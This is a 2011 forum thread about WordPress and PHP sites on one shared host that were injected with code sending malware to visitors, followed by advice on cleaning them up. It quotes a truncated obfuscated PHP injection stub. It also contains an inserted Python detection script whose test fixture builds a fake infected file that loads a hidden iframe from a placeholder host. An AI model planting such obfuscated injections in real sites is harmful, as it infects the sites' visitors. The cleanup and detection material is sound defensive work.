Geekzone: technology news, blogs, forums


GeoffisPure

459 posts

Ultimate Geek
+1 received by user: 73


#83136 11-May-2011 10:56

I'm wondering if anyone here has experience with hacked WordPress sites? I have 5 WordPress sites on the same hosting account (shared), and today when I woke up, each one of these sites is downloading malware to whomever visits the sites.

I have downloaded the core wordpress files and copied them over the existing ones, hoping that would fix the problem, but it hasn't.


Can anyone provide advice that might help clean up these infections but still leave the sites functional?  Having to start 5 wordpress sites from scratch (with all their individual customisations) would be such a chore.

I will provide an example site, but just to repeat:  this site has been infected!
http://www.nalastud.co.nz/   Watch the taskbar while it loads and you'll see what I mean.

Any tips please?

jbard
1377 posts

Uber Geek
+1 received by user: 17


  #467860 11-May-2011 11:01

This is why it is extremely important to keep popular CMS software up to date. Anyway, to help with your problem: I assume the person has added some script to the pages to force the download of malware. Firstly I would suggest taking them offline so as not to infect anyone. Then update WordPress to the latest release and try to track where the script was placed.

I imagine the script would have been placed in a file shared between all files on the site such as a head or css file.

Have a look at the source code and see if that helps.



GeoffisPure

459 posts

Ultimate Geek
+1 received by user: 73


  #467865 11-May-2011 11:15

Really appreciate your quick reply Jbard. I usually do upgrade WordPress as soon as I'm given the option, but I guess it only took one exploit for it to spread like wildfire.

I have found the injected code in MANY php files that were edited two days ago.  The injected code looks like this:


php $somecrainsignvar="kfb2rpgv"; echo base64_decode(str_rot13('CUAwpzyjqQ5xLKEyCJ5yqlO...

(Sorry, I don't know the etiquette for pasting code here)
I thought by uploading the entire Wordpress package over everything it would have fixed it, but I've seen the clean files become infected again too. :(


muppet
2642 posts

Uber Geek
+1 received by user: 1660

Trusted

  #467870 11-May-2011 11:20

Have you spoken to the hosting provider?
Maybe their php install has been modified to inject code?

Unlikely, but possible.

Since you reuploaded the files, can you see the injected code in them again?

Possible that you have a module/add-on that's been compromised?

Tim




Audiophiles are such twits! They buy such pointless stuff: Gold plated cables, $2000 power cords. Idiots.

 

OOOHHHH HYPERFIBRE!




GeoffisPure

459 posts

Ultimate Geek
+1 received by user: 73


  #467873 11-May-2011 11:31

Yes I have spoken to the host (servage.net) but they are hopeless. Just the usual "make sure you change your password" and "there's nothing we can do, you'll have to reinstall everything from your backups" etc.

Another point I should mention is that it's not JUST wordpress sites that have been hacked. I have another PHP-based forum which now has the iframe injections. And because these are on different domains, I'm inclined to believe that the hacker gained access to my FTP account.

I have changed my FTP password now, and will likely lock separate FTP accounts to individual domains.

Interestingly, one site that I replaced the core WordPress files for is now infection free, but two sites that I did the exact same thing to still show the malware. I wonder where it's hiding... driving me nuts.

muppet
2642 posts

Uber Geek
+1 received by user: 1660

Trusted

  #467874 11-May-2011 11:33

So diff the source files you have fresh vs the ones you think are infected.
Check md5/sha1 sums etc.

You'll find it eventually.

The main concern is how it got there in the first place.






GeoffisPure

459 posts

Ultimate Geek
+1 received by user: 73


  #467880 11-May-2011 11:44

I have been copying (and overwriting) ALL the WordPress files, though. Shouldn't that be enough? I guess it means the hackers have created additional files that still remain and somehow get their code executed...

 
 
 

muppet
2642 posts

Uber Geek
+1 received by user: 1660

Trusted

  #467883 11-May-2011 11:47

It depends. If you've got them consistently hitting you with an exploit, unless you replace every single file at once, you might find a single exploit infects every other file again.

Moving all files out of the webserver directory and ensuring they're fixed, then moving them back might be a better plan.

You also need to find the source of the exploit.  If you don't do this, it'll probably just keep happening. 






GeoffisPure

459 posts

Ultimate Geek
+1 received by user: 73


  #467886 11-May-2011 11:53

Is there any software you know of that will search within multiple files? For example if I downloaded every file off the server onto my computer, and searched them all for a portion of the string?

And yeah, I'm changing all my passwords and deleting as many security hazards as I can find...

jbard
1377 posts

Uber Geek
+1 received by user: 17


  #467887 11-May-2011 11:54

GeoffisPure: Is there any software you know of that will search within multiple files? For example if I downloaded every file off the server onto my computer, and searched them all for a portion of the string?

And yeah, I'm changing all my passwords and deleting as many security hazards as I can find...


Dreamweaver can do that. 

muppet
2642 posts

Uber Geek
+1 received by user: 1660

Trusted

  #467889 11-May-2011 11:55

GeoffisPure: Is there any software you know of that will search within multiple files? For example if I downloaded every file off the server onto my computer, and searched them all for a portion of the string?

And yeah, I'm changing all my passwords and deleting as many security hazards as I can find...


grep?

I assume you're on windows.  http://gnuwin32.sourceforge.net/packages/grep.htm 




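The two suggestions above from muppet (diff the fresh files against the live ones and check hash sums; grep for a portion of the string) and Geoff's request for something that searches every downloaded file can be done in one pass over a local copy of the site. The script below is an added example, not code from anyone in this thread or from Servage or WordPress. It hashes a clean package tree against the downloaded tree and reports modified, added and missing files (added files are the ones a package re-upload can never remove, which matches Geoff's point about extra files surviving), searches every .php file under core, plugins and themes for the `base64_decode(str_rot13(` stub quoted earlier in the thread, and decodes that layer so you can see what the injected line actually outputs. The regex is built from the fragment Geoff pasted, so a variant with a different variable name is only caught by the looser fallback pattern; the built-in fixture (file names, contents, the iframe target) is constructed sample data.

```python
import base64
import codecs
import hashlib
import re
import tempfile
from pathlib import Path
from typing import Dict, List, Optional, Tuple

# Pattern built from the fragment quoted in the thread:
#   $somecrainsignvar="kfb2rpgv"; echo base64_decode(str_rot13('...'))
# Group 1 captures the rot13'd base64 text so it can be decoded below.
INJECTION_RE = re.compile(
    r"\$somecrainsignvar\s*=\s*\"[^\"]*\";\s*echo\s+base64_decode\(\s*str_rot13\(\s*'([^']*)'"
)
# Looser fallback: the same decoder wrapper with any variable name.
GENERIC_RE = re.compile(r"base64_decode\(\s*str_rot13\(")

def decode_injected(encoded: str) -> str:
    """Evaluate base64_decode(str_rot13(x)) as PHP would, revealing what the
    injected line echoes into the page."""
    return base64.b64decode(codecs.decode(encoded, "rot13")).decode("utf-8", "replace")

def encode_like_injection(payload: str) -> str:
    """Inverse of decode_injected; only used to build the constructed fixture."""
    return codecs.encode(base64.b64encode(payload.encode()).decode("ascii"), "rot13")

def hash_tree(root: Path) -> Dict[str, str]:
    """SHA-256 of every file under root, keyed by POSIX-style relative path."""
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in root.rglob("*") if p.is_file()}

def diff_trees(clean: Path, live: Path) -> Dict[str, List[str]]:
    """Compare a fresh package against the downloaded site. 'added' is the list
    a re-upload can never fix: copying the package over the site only overwrites
    files the package contains, so anything dropped alongside them survives."""
    a, b = hash_tree(clean), hash_tree(live)
    return {"modified": sorted(k for k in a if k in b and a[k] != b[k]),
            "added": sorted(k for k in b if k not in a),
            "missing": sorted(k for k in a if k not in b)}

def find_injections(root: Path) -> Dict[str, Optional[str]]:
    """Search every .php file (core, plugins and themes alike) for the stub.
    Value: decoded payload on an exact match, None when only the looser
    wrapper was seen and the file needs manual review."""
    hits: Dict[str, Optional[str]] = {}
    for p in root.rglob("*.php"):
        text = p.read_text(errors="replace")
        rel = p.relative_to(root).as_posix()
        m = INJECTION_RE.search(text)
        if m:
            hits[rel] = decode_injected(m.group(1))
        elif GENERIC_RE.search(text):
            hits[rel] = None
    return hits

def build_fixtures(base: Path) -> Tuple[Path, Path]:
    """Constructed sample data: a tiny clean tree and an 'infected' copy of it.
    File names, contents and the iframe target are all made up here."""
    clean, live = base / "clean", base / "live"
    files = {"index.php": "<?php\nrequire 'wp-blog-header.php';\n",
             "wp-content/themes/demo/header.php": "<?php wp_head(); ?>\n",
             "wp-content/plugins/demo/demo.php": "<?php\n// plugin code\n"}
    for rel, body in files.items():
        for root in (clean, live):
            (root / rel).parent.mkdir(parents=True, exist_ok=True)
            (root / rel).write_text(body)
    # One line prepended to a theme file, shaped like the stub in the thread.
    payload = '<iframe src="http://malware.example/" width=1 height=1></iframe>'
    stub = ("<?php $somecrainsignvar=\"kfb2rpgv\"; echo base64_decode(str_rot13('"
            + encode_like_injection(payload) + "')); ?>\n")
    hdr = live / "wp-content/themes/demo/header.php"
    hdr.write_text(stub + hdr.read_text())
    # A file present only on the live site, i.e. not part of any package.
    extra = live / "wp-content/uploads/extra.php"
    extra.parent.mkdir(parents=True, exist_ok=True)
    extra.write_text("<?php echo 'dropped file'; ?>\n")
    return clean, live

def demo() -> dict:
    """Run all three checks over the constructed fixture and return findings."""
    with tempfile.TemporaryDirectory() as tmp:
        clean, live = build_fixtures(Path(tmp))
        return {"diff": diff_trees(clean, live),
                "injections": find_injections(live),
                "clean_injections": find_injections(clean)}

if __name__ == "__main__":
    for section, result in demo().items():
        print(section, result)
```

To use it on a real case, replace the fixture with two local directories: an untouched copy of the exact WordPress (plus plugin and theme) versions you run as `clean`, and the full download of the hosting account as `live`; a clean site should give an empty `injections` dict and an `added` list that contains only files you recognise (uploads, configuration).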


BeFs
1 post

Wannabe Geek
Inactive user


  #468183 12-May-2011 09:57

Got the same problem with Servage. Found this thread when googling the problem.
This is the second time my files got malware in them. About a year ago all my index.php files were infected, not only WordPress. And they tried to blame it on me...

Moving away to a new host as we speak. Have been with Servage many years now, but now I'm tired of cleaning up my files because of their bad security.

ChrisR
16 posts

Geek


  #468522 12-May-2011 22:42

This is a fascinating thread - my Servage account was also hit sometime in the previous 24 hours, with what looks to be an identical exploit. Several PHP scripts had code inserted at the top of the page which starts "$somecrainsignvar=" and then proceeds to execute the redirect using "echo base64_decode(str_rot13(".

We operate our own in-house PHP code (no WordPress CMS) with a few simple scripts (Swift mailer & Radinks Java uploader) and all of our form inputs are scrubbed to remove injected code. All uploads are also quarantined in folders with .htaccess restrictions on all script executions. I too have been told to change passwords and reupload my files (very annoying) and check folder permissions but none of this means much if the hacker gained access through the Control Panel. 

Anyone got any good ideas on where the point of access might have been? 

Cheers, ChrisR. 

GeoffisPure

459 posts

Ultimate Geek
+1 received by user: 73


  #468523 12-May-2011 22:48

Hi Chris & Befs,
I have just finished restoring all my wordpress sites (and even non-wordpress sites) to their pre-malware conditions... fingers crossed!

This particular hacker/malware infector was quite thorough, and injected their PHP code in many (but not all) PHP files throughout my sites.

I may post a detailed clean-up instruction later, but where I was going wrong was assuming that it was only the core wordpress files that were edited. It wasn't. Once I cleaned up the plugins and theme folders too, my sites are now malware free. Fingers crossed, at least.

It definitely sounds like a problem with Servage to me, though I've tried contacting them and they won't have a bar of it. The infections spread across multiple domain names, but within the same account. While it's possible they cracked my FTP password that could access all the sites (and I have changed my password accordingly), I think this is unlikely.

freitasm
BDFL - Memuneh
80646 posts

Uber Geek
+1 received by user: 41030

Administrator
ID Verified
Trusted
Geekzone
Lifetime subscriber

  #468525 12-May-2011 22:50

Interesting, just did a quick search on this provider and it seems every few months there is an event like this...





 


GeoffisPure

459 posts

Ultimate Geek
+1 received by user: 73


  #468527 12-May-2011 22:59

I have just submitted the following support ticket to Servage. Can somebody please teach me the correct method of displaying quotes/code in forum posts?   Anyway, I'll let you know if any reply:


Good Evening,
Can I please draw your attention to the following forum page:
http://www.geekzone.co.nz/forums.asp?forumid=72&topicid=83136

On this page, you will see me explaining a problem I previously contacted you about  (code injection, which I've now fixed), but what I would like to draw your attention to is the fact that at least two other Servage customers have experienced the same problem in the past two days.

I find it hard to accept that somebody guessed my control panel or FTP passwords (but I've changed them anyway),  and want to urge servage to investigate what appears to be a widespread problem with security.

Thank you.
